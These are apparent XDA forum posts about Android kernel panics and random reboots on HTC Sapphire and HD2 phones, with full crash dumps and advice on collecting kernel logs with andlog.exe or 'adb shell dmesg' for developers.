[ 106.704254] r10: 00000000 r9 : c02edb50 r8 : c6f9246c
[ 106.704681] r7 : 00000000 r6 : 69ef2e6c r5 : cba190e0 r4 : 41b88170
[ 106.704925] r3 : 6b55bd8f r2 : 11983e9c r1 : 00000000 r0 : 00000000
[ 106.705383] Flags: nzCv IRQs off FIQs on Mode SVC_32 ISA ARM Segment user
[ 106.705841] Control: 00c5387d Table: 1e50c008 DAC: 00000015
[ 106.706085]
[ 106.706085] PC: 0xc0049c0c:
[ 106.706542] 9c0c e591105c e5940058 e0522006 e0c33007 e1510003 e1a0c003 8a000002 1a000003
[ 106.709045] 9c2c e1500002 9a000001 e1a02000 e1a0c001 e1c406d0 e5842058 e3a02001 e0900002
[ 106.711547] 9c4c e3a03000 e0a11003 e584c05c e1c406f0 e5952044 e3a03ffe e0822003 e1c466d8
[ 106.714019] 9c6c e1c220d0 e1c405d0 e0922006 e0a33007 e0522000 e0c33001 e3a00000 e3a01000
[ 106.716278] 9c8c e1c426f8 e1c405f0 e1a00005 e1a01004 ebffffbe e5952044 e3a03ffe e0822003
[ 106.718566] 9cac e1c220d0 e1c422f0 e5953044 e5854034 e5942000 e5933024 e1530082 3a00000f
[ 106.721069] 9ccc e1c422d8 e1c463d8 e59400a4 e594c0a0 e0522006 e0c33007 e1500003 e1a01003
[ 106.723541] 9cec 8a000002 1a000003 e15c0002 9a000001 e1a0200c e1a01000 e58420a0 e58410a4
[ 106.725830]
[ 106.725830] LR: 0xc0049d58:
[ 106.726470] 9d58 e3550000 01a00005 089da8f0 e2804038 e3a06000 e5945024 e5940038 e3550000
[ 106.728759] 9d78 12455008 e3500000 0a000004 e1a01005 ebfffe4b e3500000 d5945038 da000006
[ 106.731048] 9d98 e594003c e3500000 0a000003 e1a01005 ebfffe43 e3500000 d594503c e594303c
[ 106.733551] 9db8 e1a00004 e1530005 e5943038 0584603c e1530005 05846038 e1a01005 ebffff7f
[ 106.736022] 9dd8 e5954130 e3540000 1affffe1 e2450030 e89da8f0 e1a0c00d e92ddbf0 e24cb004
[ 106.738281] 9df8 e1c081d8 e1c143d0 e1a03000 e280c020 e0544008 e0c55009 e3a00001 e3a0e000
[ 106.740753] 9e18 ea00000b e1c262d8 e282c008 e0566008 e0c77009 e1570005 ca000004 1a000001
[ 106.743225] 9e38 e1560004 8a000001 e282c004 e3a00000 e1a0e002 e59c2000 e3520000 1afffff0
[ 106.745544]
[ 106.745544] SP: 0xc534bd98:
[ 106.746185] bd98 ff67e0b8 ffffffff c534be4c c6f92230 cba190e0 00000001 ffffffff c534be04
[ 106.748687] bdb8 69ef2e6c 00000000 c534be34 c534bdd0 c00259ac c0025200 00000000 00000000
[ 106.750976] bdd8 11983e9c 6b55bd8f 41b88170 cba190e0 69ef2e6c 00000000 c6f9246c c02edb50
[ 106.753479] bdf8 00000000 c534be34 00000000 c534be18 c0049dd8 c0049c8c 20000093 ffffffff
[ 106.755950] be18 cba190e0 c7058170 00000000 000003f8 c534be54 c534be38 c0049dd8 c0049be4
[ 106.758209] be38 c6f92200 c03ee160 c534a000 000003f8 c534be9c c534be58 c02e92bc c0049d54
[ 106.760681] be58 d56ac5a1 00000018 ad080000 c6f9246c d56ac5a1 00000018 c6f92200 c534a000
[ 106.763153] be78 00000000 00000002 000000f0 c0025f24 c534a000 10000000 c534bebc c534bea0
[ 106.765655]
[ 106.765655] FP: 0xc534bdb4:
[ 106.766113] bdb4 c534be04 69ef2e6c 00000000 c534be34 c534bdd0 c00259ac c0025200 00000000
[ 106.768585] bdd4 00000000 11983e9c 6b55bd8f 41b88170 cba190e0 69ef2e6c 00000000 c6f9246c
[ 106.770874] bdf4 c02edb50 00000000 c534be34 00000000 c534be18 c0049dd8 c0049c8c 20000093
[ 106.773376] be14 ffffffff cba190e0 c7058170 00000000 000003f8 c534be54 c534be38 c0049dd8
[ 106.775878] be34 c0049be4 c6f92200 c03ee160 c534a000 000003f8 c534be9c c534be58 c02e92bc
[ 106.778381] be54 c0049d54 d56ac5a1 00000018 ad080000 c6f9246c d56ac5a1 00000018 c6f92200
[ 106.780639] be74 c534a000 00000000 00000002 000000f0 c0025f24 c534a000 10000000 c534bebc
[ 106.783142] be94 c534bea0 c006ff68 c02e9138 c534bfb0 c0025f24 00000000 000000f0 c534bf9c
[ 106.785430]
[ 106.785430] R5: 0xcba19060:
[ 106.785858] 9060 0000000a 0000000b 0000000c 0000000d 0000000e 0000000f 00000010 00000011
[ 106.788330] 9080 00000012 00000013 00000014 00000015 00000016 00000017 00000018 00000019
[ 106.790802] 90a0 0000001a 0000001b 0000001c 0000001d 0000001e 0000001f 00000020 00000021
[ 106.793060] 90c0 00000022 00000023 00000024 00000025 00000026 00000027 ffffffff 00000000
[ 106.795562] 90e0 00009000 00000000 00000024 00000000 e619afda 00000000 490f6bef 00000003
[ 106.797821] 9100 c6fcccd8 c7058178 c5309064 c6ee94a4 00000000 00000000 00000000 00000000
[ 106.800323] 9120 00000804 c03ee160 cba19188 c03ee538 cba20560 00000000 00000000 00000000
[ 106.802581] 9140 00000000 00000000 00000000 00000000 00000000 00000000 fff00000 ffffffff
[ 106.805053]
[ 106.805084] R8: 0xc6f923ec:
[ 106.805511] 23ec cbcfa280 cbcfa280 c6f923f4 c6f923f4 c530869c c53031fc c5303000 c6f92408
[ 106.808013] 240c c6f92408 c6f92410 c6f92410 00000000 c6f5a6a8 c6f5a6a0 c505c624 cc5e9a6c
[ 106.810302] 242c cc5e9a60 c505c630 c03ca9a0 c03ca990 c53086dc c530323c 00000000 00000000
[ 106.812774] 244c 00000000 00000003 00000000 00000003 00000000 00000000 00000000 00000000
[ 106.815063] 246c 00000011 0000000e 00000039 01442d0f 00000039 01442d0f 000003cf 00000000
[ 106.817535] 248c 00000000 00000000 00000000 00000000 00000000 c6f924a0 c6f924a0 c6f924a8
[ 106.820037] 24ac c6f924a8 c6f924b0 c6f924b0 cc5ed8a0 cc5ed8a0 00000001 c6f924c4 c6f924c4
[ 106.822326] 24cc 70616548 6b726f57 00007265 00000000 00000000 00000001 00000000 00000000
[ 106.824829]
[ 106.824829] R9: 0xc02edad0:
[ 106.825469] dad0 0004624c 00057ff5 0006dd25 000899bc 000abe5d 000d5d21 0010c73e 0014ff97
[ 106.827758] daf0 001a3434 0020ea87 00295252 003351fe 00400000 004fec05 00640e12 007c97d9
[ 106.830230] db10 009aee73 00c3a13e 00f0f0f1 0130d190 017d05f4 01de5d6e 0253c825 02f14990
[ 106.832702] db30 03a83a84 04924924 05b05b05 071c71c7 08d3dcb0 0b21642c 0e38e38e 11111111
[ 106.835021] db50 c02ed8c8 c004b210 c004af90 c004ac44 c004aa18 c0049d48 c004a950 c0049d18
[ 106.837493] db70 c004a88c c004b24c 00000000 c0048720 c00486c0 c004a85c c02edb50 c004f868
[ 106.839965] db90 c004c630 c0048768 c00487c4 c0049960 c004c60c c00488a4 c004c508 00000000
[ 106.842468] dbb0 00000000 c0048804 c004884c 00000000 54445352 00585a74 00000000 00000000
[ 106.844726] Process HeapWorker (pid: 331, stack limit = 0xc534a260)
[ 106.845184] Stack: (0xc534be18 to 0xc534c000)
[ 106.845428] be00: cba190e0 c7058170
[ 106.847686] be20: 00000000 000003f8 c534be54 c534be38 c0049dd8 c0049be4 c6f92200 c03ee160
[ 106.850189] be40: c534a000 000003f8 c534be9c c534be58 c02e92bc c0049d54 d56ac5a1 00000018
[ 106.852539] be60: ad080000 c6f9246c d56ac5a1 00000018 c6f92200 c534a000 00000000 00000002
[ 106.855041] be80: 000000f0 c0025f24 c534a000 10000000 c534bebc c534bea0 c006ff68 c02e9138
[ 106.857513] bea0: c534bfb0 c0025f24 00000000 000000f0 c534bf9c c534bec0 c002828c c006fe48
[ 106.860015] bec0: ffffffff 00000000 c534bf4c c6f92520 c00b3b18 c00e11ec 00000000 c02330dc
[ 106.862304] bee0: c009fe28 100ffe24 00000004 100ffe23 00000001 100ffe58 0000000b 00000000
[ 106.864807] bf00: c534bf1c c534bf10 c006d384 c018a5fc c534bfa4 c534bf20 c009ce90 00000000
[ 106.867248] bf20: 00000000 00000000 000000f0 c0025f24 c534a000 ad080fa8 c534bfa4 c534bf48
[ 106.869750] bf40: c0077c80 c0077110 ad080fa4 00000000 ffffffff 00000004 cba906a0 ffffffb7
[ 106.872039] bf60: c534bfa4 c534bf70 c00b3c00 c00b4a40 00000000 ad080fa4 ad080fa8 00000000
[ 106.874481] bf80: 000000f0 c0025f24 c534a000 10000000 c534bfac c534bfa0 c00287b8 c002824c
[ 106.876953] bfa0: 00000000 c534bfb0 c0025dec c0028794 ad080fa8 00000000 ffffffb7 00000000
[ 106.879455] bfc0: ad080fa4 ad080fa8 00000000 000000f0 00100000 ad041c25 10000000 00134738
[ 106.881713] bfe0: ad080248 100ffe38 afe0f5d4 afe0dc40 60000010 ad080fa8 00000000 00000000
[ 106.884216] Backtrace:
[ 106.884674] [<c0049bd8>] (set_next_entity+0x0/0x140) from [<c0049dd8>] (pick_next_task_fair+0x90/0xa4)
[ 106.885833] r7:000003f8 r6:00000000 r5:c7058170 r4:cba190e0
[ 106.887207] [<c0049d48>] (pick_next_task_fair+0x0/0xa4) from [<c02e92bc>] (schedule+0x190/0x444)
[ 106.888153] r7:000003f8 r6:c534a000 r5:c03ee160 r4:c6f92200
[ 106.889495] [<c02e912c>] (schedule+0x0/0x444) from [<c006ff68>] (refrigerator+0x12c/0x18c)
[ 106.890655] [<c006fe3c>] (refrigerator+0x0/0x18c) from [<c002828c>] (do_signal+0x4c/0x548)
[ 106.891601] r7:000000f0 r6:00000000 r5:c0025f24 r4:c534bfb0
[ 106.892974] [<c0028240>] (do_signal+0x0/0x548) from [<c00287b8>] (do_notify_resume+0x30/0x34)
[ 106.894104] [<c0028788>] (do_notify_resume+0x0/0x34) from [<c0025dec>] (work_pending+0x1c/0x20)
[ 106.895080] Code: e0522000 e0c33001 e3a00000 e3a01000 (e1c426f8)
[ 106.896850] Kernel panic - not syncing: Fatal exception
[ 106.897216] apanic_writeflashpage: No panic_write available
[ 106.897674] apanic: Flash write failed (0)
Not sure if it's related, but I also see this in the dmesg:
Code:
<6>[15014.889343] get_smem_clock: exit timeout state 10d29 clock 509296055 in 257 ticks
<6>[15014.914093] get_smem_clock: invalid start state 10d29 clock 509296055
<6>[15016.968231] get_smem_clock: exit timeout state 10d29 clock 509370592 in 257 ticks
<6>[15017.197174] get_smem_clock: invalid start state 10d29 clock 509370592
<6>[15019.866333] get_smem_clock: exit timeout state 10d29 clock 509459049 in 257 ticks
<6>[15019.877075] get_smem_clock: invalid start state 10d29 clock 509459049
<6>[15021.312255] get_smem_clock: exit timeout state 10d29 clock 509507224 in 257 ticks
<6>[15021.396606] get_smem_clock: invalid start state 10d29 clock 509507224
<6>[15022.048858] get_smem_clock: exit timeout state 10d29 clock 509535679 in 257 ticks
<6>[15022.216491] get_smem_clock: invalid start state 10d29 clock 509535679
<6>[15026.966278] get_smem_clock: exit timeout state 10d29 clock 509691696 in 257 ticks
<6>[15026.977020] get_smem_clock: invalid start state 10d29 clock 509691696
<6>[15026.982513] get_smem_clock: exit timeout state 10d29 clock 509692230 in 257 ticks
<6>[15026.993225] get_smem_clock: invalid start state 10d29 clock 509692230
Has anybody seen anything like this?
For reference, the phone is:
Sapphire PVT 32A ENG S-OFF H
HBOOT-1.33.2010 (SAPP10000)
CPLD-12
RADIO-3.22.20.17
I've used a couple of different SPL's and radios. Never makes any difference.
hate to say this, but I've gone thru 2 HTC Magic's from Rogers and both were doing the random re-boot, seemed especially while the screen was off (sleep mode?) and getting a text or a phone call. The worst thing was that the last phone, which was a warranty replacement, wasn't even rooted yet but had the FACTORY IMAGE still.
Standard operator ROMS (with the HTC kernel) are fine.. so this isn't a problem like that.
I have the EXACT problem! How do I know which ROMS have an HTC kernel though?
I've done a lot of trial and error. I've tried so many ROMS, and it seemed that any custom kernel has these reboot problems.. and you can only get Android 1.5 ROMS with HTC kernel
You can find out your kernel version in Settings -> About Phone. It'll have 'htc' in there if it's a HTC kernel. On my G1, I've got 2.6.29-cm42 for a Cyanogen kernel for example.
I've flashed the phone now with a generic carrier ROM, just so that it would be stable. Not happy about doing it.. but at least it works. I image that it'll never even see Android 1.6, because they'll never release it.

[Discussion] LEO Android Testing

Main problem of developing - it's testing / feedback
Of course developers test stuffs by themselfs, but it's seems not enough.
Commercially companies like HTC, Samsung, Motorolla have special people who perform tests.
While our developing is free, in our free time for hobby, so we need community support.
In most cases kernel logs can really help developers to improve and fix annoying bug.
Without logs developers don't have chance to detect problem and fix it, so if u appear on IRC and say "hey, I got SOD 2 minutes ago" it's compete useless.
But if u say "hey, I got SOD while playing sound, here my kernel log" it can be really useful.
Because developers can open this log and see something like this at the end:
Code:
[ 54.323889] kernel BUG at arch/arm/mach-msm/qdsp6_10/pcm_out.c:188!
[ 54.323918] Unable to handle kernel NULL pointer dereference at virtual address 00000000
[ 54.323940] pgd = c7bf4000
[ 54.323951] [00000000] *pgd=27a12031, *pte=00000000, *ppte=00000000
[ 54.323981] Internal error: Oops: 817 [#1] PREEMPT
[ 54.323996] last sysfs file: /sys/devices/system/cpu/cpu0/cpufreq/stats/time_in_state
[ 54.324013] Modules linked in:
[ 54.324034] CPU: 0 Not tainted (2.6.32.9-38066-g672726a-dirty #168)
[ 54.324078] PC is at __bug+0x20/0x2c
[ 54.324114] LR is at release_console_sem+0x1f4/0x208
[ 54.324132] pc : [<c006d7d0>] lr : [<c009cfd0>] psr: 60000013
[ 54.324141] sp : c6b51ed8 ip : c6b51e10 fp : c6b51ee4
[ 54.324159] r10: 0000b5d0 r9 : c6b50000 r8 : 00000000
[ 54.324174] r7 : 00000000 r6 : c579f440 r5 : c7bf89a0 r4 : c6b51f08
[ 54.324192] r3 : 00000000 r2 : 00000000 r1 : 0000a043 r0 : 0000004d
[ 54.324212] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
[ 54.324231] Control: 10c5787d Table: 27bf4019 DAC: 00000015
[ 54.324246]
[ 54.324250] PC: 0xc006d750:
[ 54.324261] d750 e89da800 c03ca921 e1a0c00d e92dd800 e24cb004 e1a0c001 e1a03002 e1a01000
[ 54.324308] d770 e1a0200c e59f0004 eb0b7aea e89da800 c03ca938 e1a0c00d e92dd800 e24cb004
[ 54.324355] d790 e1a0c001 e1a03002 e1a01000 e1a0200c e59f0004 eb0b7adf e89da800 c03ca94f
[ 54.324401] d7b0 e1a0c00d e92dd800 e24cb004 e1a02001 e1a01000 e59f000c eb0b7ad6 e3a03000
[ 54.324447] d7d0 e5833000 eafffffe c03ca966 e1a0c00d e92dd800 e24cb004 e59f0004 e30012db
[ 54.324493] d7f0 ebffffee c03ca97f e1a0c00d e92dd800 e24cb004 e1a01000 e59f000c eb0b7ac5
[ 54.324539] d810 e59f0008 e30012bf ebffffe4 c03ca997 c03ca97f e1a0c00d e92dd800 e24cb004
[ 54.324585] d830 e59f000c eb0b7abb e59f0008 eb0b7ab9 e89da800 c03ca9b7 c03ca9ee e1a0c00d
[ 54.324632]
[ 54.324636] LR: 0xc009cf50:
[ 54.324647] cf50 ea000006 e1a00005 e59f3080 e1a05002 e8930006 e2422001 e1550006 1affffe4
[ 54.324693] cf70 e59f3068 e1a01006 e5932048 ebfffe5c e121f008 eaffffa3 e3a03000 e59f0044
[ 54.324739] cf90 e5823018 eb0068ad e121f008 e1a0200d e3c23d7f e3c3303f e5932004 e2422001
[ 54.324785] cfb0 e5832004 e5933000 e3130002 0a000000 eb0abec0 e35a0000 089dadf0 ebfffe9a
[ 54.324831] cfd0 e89dadf0 c0450c60 c0425bbc c03d1c11 c0425b80 e1a0c00d e92dd830 e24cb004
[ 54.324877] cff0 e59f4028 e5943000 e3530000 089da830 e3a0c000 e3a01001 e1a0300c e59f0010
[ 54.324923] d010 e1a02001 e584c000 ebffe70e e89da830 c0425be0 c0425b9c e1a0c00d e92dd800
[ 54.324969] d030 e24cb004 e1a0200d e3c23d7f e3c3303f e5933004 e3c3333f e3c330ff e3530000
[ 54.325016]
[ 54.325020] SP: 0xc6b51e58:
[ 54.325031] 1e58 5d393838 205b0020 34352020 3332332e 5d333538 ffffffff c6b51ec4 c579f440
[ 54.325077] 1e78 00000000 00000000 c6b51ee4 c6b51e90 c0069aac c00692d4 0000004d 0000a043
[ 54.325123] 1e98 00000000 00000000 c6b51f08 c7bf89a0 c579f440 00000000 00000000 c6b50000
[ 54.325167] 1eb8 0000b5d0 c6b51ee4 c6b51e10 c6b51ed8 c009cfd0 c006d7d0 60000013 ffffffff
[ 54.325213] 1ed8 c6b51f3c c6b51ee8 c0087c4c c006d7bc 00000001 000012c0 0000b5d0 c579f470
[ 54.325259] 1ef8 0000003d 00000000 c7bf89a0 c00b2728 c6b51f08 c6b51f08 c0420340 c572d920
[ 54.325305] 1f18 0000b5d0 c6b51f70 000012c0 000012c0 c6b50000 40207000 c6b51f6c c6b51f40
[ 54.325351] 1f38 c0107c2c c0087b40 297f5aac b46c40c0 40c61004 00000000 00000000 c572d920
[ 54.325398]
[ 54.325402] IP: 0xc6b51d90:
[ 54.325413] 1d90 c6b51e90 c7a09370 c6b51ddc c6b51da8 c006fc60 c006f9ec c6b51dd4 c6b51db8
[ 54.325459] 1db0 c027e8f4 c041fe1c c041fe8c 00000817 c6b51e90 00000000 20000113 0000b5d0
[ 54.325504] 1dd0 c6b51e8c c6b51de0 c0069304 c006fa68 0000a043 c6b50000 c6b51e0c c6b51df8
[ 54.325550] 1df0 c009c978 c009c88c c0425b80 0000a043 c6b51e34 c6b51e10 c009cfd0 c009ca48
[ 54.325596] 1e10 00000000 0000000c 00000036 c6b51e4e c0450d1b c6b51e5d c6b51eac c6b51e38
[ 54.325642] 1e30 c009d618 c009cde8 c6b51ebc 00000002 60000013 0000004d 00000000 205b0003
[ 54.325687] 1e50 34352020 3332332e 5d393838 205b0020 34352020 3332332e 5d333538 ffffffff
[ 54.325733] 1e70 c6b51ec4 c579f440 00000000 00000000 c6b51ee4 c6b51e90 c0069aac c00692d4
[ 54.325780]
[ 54.325784] FP: 0xc6b51e64:
[ 54.325795] 1e64 3332332e 5d333538 ffffffff c6b51ec4 c579f440 00000000 00000000 c6b51ee4
[ 54.325841] 1e84 c6b51e90 c0069aac c00692d4 0000004d 0000a043 00000000 00000000 c6b51f08
[ 54.325886] 1ea4 c7bf89a0 c579f440 00000000 00000000 c6b50000 0000b5d0 c6b51ee4 c6b51e10
[ 54.325932] 1ec4 c6b51ed8 c009cfd0 c006d7d0 60000013 ffffffff c6b51f3c c6b51ee8 c0087c4c
[ 54.325978] 1ee4 c006d7bc 00000001 000012c0 0000b5d0 c579f470 0000003d 00000000 c7bf89a0
[ 54.326023] 1f04 c00b2728 c6b51f08 c6b51f08 c0420340 c572d920 0000b5d0 c6b51f70 000012c0
[ 54.326069] 1f24 000012c0 c6b50000 40207000 c6b51f6c c6b51f40 c0107c2c c0087b40 297f5aac
[ 54.326115] 1f44 b46c40c0 40c61004 00000000 00000000 c572d920 000012c0 0000b5d0 c6b51fa4
[ 54.326162]
[ 54.326166] R4: 0xc6b51e88:
[ 54.326178] 1e88 c0069aac c00692d4 0000004d 0000a043 00000000 00000000 c6b51f08 c7bf89a0
[ 54.326223] 1ea8 c579f440 00000000 00000000 c6b50000 0000b5d0 c6b51ee4 c6b51e10 c6b51ed8
[ 54.326268] 1ec8 c009cfd0 c006d7d0 60000013 ffffffff c6b51f3c c6b51ee8 c0087c4c c006d7bc
[ 54.326314] 1ee8 00000001 000012c0 0000b5d0 c579f470 0000003d 00000000 c7bf89a0 c00b2728
[ 54.326360] 1f08 c6b51f08 c6b51f08 c0420340 c572d920 0000b5d0 c6b51f70 000012c0 000012c0
[ 54.326406] 1f28 c6b50000 40207000 c6b51f6c c6b51f40 c0107c2c c0087b40 297f5aac b46c40c0
[ 54.326452] 1f48 40c61004 00000000 00000000 c572d920 000012c0 0000b5d0 c6b51fa4 c6b51f70
[ 54.326497] 1f68 c0107d9c c0107b80 00000000 00000000 00000008 00000001 00000000 0000b450
[ 54.326543]
[ 54.326547] R5: 0xc7bf8920:
[ 54.326558] 8920 c7bf891c 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.326603] 8940 00000000 00000000 00000000 c0480380 c7bf8950 c7bf8950 00000000 c7bf895c
[ 54.326648] 8960 c7bf895c 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.326692] 8980 00000000 0000c350 0000c350 00000000 40406f00 00000000 00000000 00000000
[ 54.326737] 89a0 00000000 c6b50000 00000002 00400040 00000000 ffffffff 00000065 00000065
[ 54.326782] 89c0 00000065 00000000 c0350da8 00000000 0001184b 0000e9d0 00000001 00000000
[ 54.326827] 89e0 00000000 c0425628 c0425628 00000001 a5f3e77f 0000000c 011eaf1b 00000000
[ 54.326873] 8a00 06aabe75 00000005 011eaf1b 00000000 00000000 00000000 00001ad8 00000000
[ 54.326918]
[ 54.326922] R6: 0xc579f3c0:
[ 54.326933] f3c0 c579f3bc 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.326978] f3e0 000010c3 c579f3e4 c579f3e4 00000003 c7da4cd0 00000000 00000000 c7f1dc00
[ 54.327023] f400 c79ee5fc 00000001 00000000 00000000 00343f00 00349d70 00001fe5 c579f41c
[ 54.327069] f420 c579f41c 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.327113] f440 250a4000 ffa06000 00001000 00001000 250a5000 ffa07000 00001000 000002c0
[ 54.327159] f460 00000000 00000000 00000000 00000001 c579f470 c579f470 c50d1000 00000000
[ 54.327205] f480 00000001 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.327249] f4a0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.327294]
[ 54.327298] R9: 0xc6b4ff80:
[ 54.327309] ff80 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.327354] ffa0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.327398] ffc0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.327441] ffe0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.327485] 0000 00000000 00000002 00000000 c7bf89a0 c0425ad0 00000000 00000035 c7c739b0
[ 54.327530] 0020 c7a09370 c7bf89a0 c7a2f620 c6b50000 c7bf8a38 c7bf8c50 c6b51e8c c6b51e48
[ 54.327576] 0040 c034c880 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.327620] 0060 40306f00 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.327669] Process Playback Thread (pid: 1216, stack limit = 0xc6b502f0)
[ 54.327687] Stack: (0xc6b51ed8 to 0xc6b52000)
[ 54.327704] 1ec0: c6b51f3c c6b51ee8
[ 54.327730] 1ee0: c0087c4c c006d7bc 00000001 000012c0 0000b5d0 c579f470 0000003d 00000000
[ 54.327755] 1f00: c7bf89a0 c00b2728 c6b51f08 c6b51f08 c0420340 c572d920 0000b5d0 c6b51f70
[ 54.327779] 1f20: 000012c0 000012c0 c6b50000 40207000 c6b51f6c c6b51f40 c0107c2c c0087b40
[ 54.327804] 1f40: 297f5aac b46c40c0 40c61004 00000000 00000000 c572d920 000012c0 0000b5d0
[ 54.327829] 1f60: c6b51fa4 c6b51f70 c0107d9c c0107b80 00000000 00000000 00000008 00000001
[ 54.327854] 1f80: 00000000 0000b450 ab70aa89 000012c0 00000004 c006a144 00000000 c6b51fa8
[ 54.327879] 1fa0: c0069fc0 c0107d64 0000b450 ab70aa89 00000013 0000b5d0 000012c0 ab70a697
[ 54.327904] 1fc0: 0000b450 ab70aa89 000012c0 00000004 00100000 a9d1b8e5 40207000 0000d018
[ 54.327929] 1fe0: ab70c6cc 40306d58 ab7073bf afe0c95c 00000010 00000013 581a447b 32081c20
[ 54.327946] Backtrace:
[ 54.327974] [<c006d7b0>] (__bug+0x0/0x2c) from [<c0087c4c>] (pcm_write+0x118/0x1e0)
[ 54.328024] [<c0087b34>] (pcm_write+0x0/0x1e0) from [<c0107c2c>] (vfs_write+0xb8/0x164)
[ 54.328054] [<c0107b74>] (vfs_write+0x0/0x164) from [<c0107d9c>] (sys_write+0x44/0x70)
[ 54.328072] r8:0000b5d0 r7:000012c0 r6:c572d920 r5:00000000 r4:00000000
[ 54.328120] [<c0107d58>] (sys_write+0x0/0x70) from [<c0069fc0>] (ret_fast_syscall+0x0/0x2c)
[ 54.328138] r8:c006a144 r7:00000004 r6:000012c0 r5:ab70aa89 r4:0000b450
[ 54.328179] Code: e1a01000 e59f000c eb0b7ad6 e3a03000 (e5833000)
[ 54.328200] ---[ end trace 7e446c20b8bf60cf ]---
[ 54.328216] Kernel panic - not syncing: Fatal exception
[ 54.328228] Backtrace:
[ 54.328277] [<c006dad4>] (dump_backtrace+0x0/0x110) from [<c034c1e8>] (dump_stack+0x18/0x1c)
[ 54.328296] r7:c006d7d4 r6:c6b51d67 r5:c006d7d2 r4:c0450820
[ 54.328337] [<c034c1d0>] (dump_stack+0x0/0x1c) from [<c034c250>] (panic+0x64/0x13c)
[ 54.328364] [<c034c1ec>] (panic+0x0/0x13c) from [<c006de64>] (die+0x280/0x2c8)
[ 54.328381] r3:00000001 r2:c6b51d38 r1:0000c846 r0:c03cab72
[ 54.328426] [<c006dbe4>] (die+0x0/0x2c8) from [<c006fa4c>] (__do_kernel_fault+0x6c/0x7c)
[ 54.328456] [<c006f9e0>] (__do_kernel_fault+0x0/0x7c) from [<c006fc60>] (do_page_fault+0x204/0x220)
[ 54.328475] r7:c7a09370 r6:c6b51e90 r5:c7bf89a0 r4:00000000
[ 54.328515] [<c006fa5c>] (do_page_fault+0x0/0x220) from [<c0069304>] (do_DataAbort+0x3c/0x9c)
[ 54.328542] [<c00692c8>] (do_DataAbort+0x0/0x9c) from [<c0069aac>] (__dabt_svc+0x4c/0x60)
[ 54.328562] Exception stack(0xc6b51e90 to 0xc6b51ed8)
[ 54.328579] 1e80: 0000004d 0000a043 00000000 00000000
[ 54.328604] 1ea0: c6b51f08 c7bf89a0 c579f440 00000000 00000000 c6b50000 0000b5d0 c6b51ee4
[ 54.328627] 1ec0: c6b51e10 c6b51ed8 c009cfd0 c006d7d0 60000013 ffffffff
[ 54.328643] r8:00000000 r7:00000000 r6:c579f440 r5:c6b51ec4 r4:ffffffff
[ 54.328687] [<c006d7b0>] (__bug+0x0/0x2c) from [<c0087c4c>] (pcm_write+0x118/0x1e0)
[ 54.328713] [<c0087b34>] (pcm_write+0x0/0x1e0) from [<c0107c2c>] (vfs_write+0xb8/0x164)
[ 54.328741] [<c0107b74>] (vfs_write+0x0/0x164) from [<c0107d9c>] (sys_write+0x44/0x70)
[ 54.328759] r8:0000b5d0 r7:000012c0 r6:c572d920 r5:00000000 r4:00000000
[ 54.328803] [<c0107d58>] (sys_write+0x0/0x70) from [<c0069fc0>] (ret_fast_syscall+0x0/0x2c)
[ 54.328822] r8:c006a144 r7:00000004 r6:000012c0 r5:ab70aa89 r4:0000b450
and it's clear that error caused by sound output code, even we know place where it crashed: "pcm_out.c:188". So we can go and look around.
It give much more chances to fix problem and make android stable
For example, source of "mysterious" SOD problem can be detected via kernel logs.
It don't appear random, it appear only on some condition. It's nice if testers able to find this condition and provide kernel logs to developers.
I will expand this message later with more information.
TBD
im in..ill help all i can...
我代表中国用户感谢你们,i will help what i can
Sent from my HTC HD2 using XDA App
Cotulla, do not forget about russian forum 4pda.ru, are ready to help with tests!
got it |o|
han shui ...
Cotulla, you are the THE MAN! Thanks for all your hard work.
I'll be happy to report any bugs with logs... as soon as someone explains how to create the log or where it is located etc
Hopefully thats what this below means
Cotulla said:
I will expand this message later with more information.
TBD
Click to expand...
Click to collapse
i been reading irc logs and i dont now about developing but i can test and send logs you can count with me there so many builds out there but most important is testing and fixing thank you cottula for your hard work
Im also in.. so i need kernel logger from cotulla.pp.ru right?
Sent from my HD2 using XDA app
20mihalko said:
Im also in.. so i need kernel logger from cotulla.pp.ru right?
Sent from my HD2 using XDA app
Click to expand...
Click to collapse
just took a look through cotulla.pp.ru.... cant seem to find a kernel logger.... got a direct link?
Would like to help if possible.. however, I'm not sure where do we get the kernel log? Is the log currently available for extraction and submission?
Sent from my HTC Leo using XDA App
i think he will be posting that info soon...
I help if i can too !!
Greets from Germany
Anything to help out the development.
Im using Android on a day-by-day basis now, so there's bound to be stuff i could report with
Come on guys, you wont help developers if you just write "ok i will help you" Nobody need that besides this thread is going to be confusing. Please help Cotulla and provide him your logs.
How to create logs:
Download the tool Andlog on Cotullas Homepage: http://cotulla.pp.ru/leo/Android/andlog.exe
After you detect Problems in Android (Sleep of Dead or something) you need to reset your device with the red reset button on the back of your HD2
Don't remove battery!!!
Once WM is booted you can run andlog.exe and it will create a andlog.txt file on the root of your device. Be aware that Andlog dont show any message! (like CLRCAD)
Paste the content here: http://pastebin.com
and link it here in this forum with detailed information
Ok i will start with providing logs:
Got SOD while LEO was in Standby. Waited any seconds but screen stayed black
Log: http://pastebin.com/DPPAd6ep
Iam ready for testing any thing
Sent from my HTC HD2 using Xda application
ok, i got mine already for issues..i will post them when i find them
moorgogel said:
Come on guys, you wont help developers if you just write "ok i will help you" Nobody need that besides this thread is going to be confusing. Please help Cotulla and provide him your logs.
How to create logs:
....
Click to expand...
Click to collapse
ahhh, good man. Thank you.
edit:
I know this should probably be common sense but just to make it clear to everyone who wants to help...
Should we report all (even minor/trivial) bugs or just report major bugs ( such as SOD) for now?
cotulla? moorgogel?
moorgogel, nice guide, thanks!
other method (for non-fatal errors) possible to use ADB from Android SDK.
just put in command line
Code:
adb shell dmesg > dmesg.txt
and u got current kernel log in dmesg.txt.
I know this should probably be common sense but just to make it clear to everyone who wants to help...
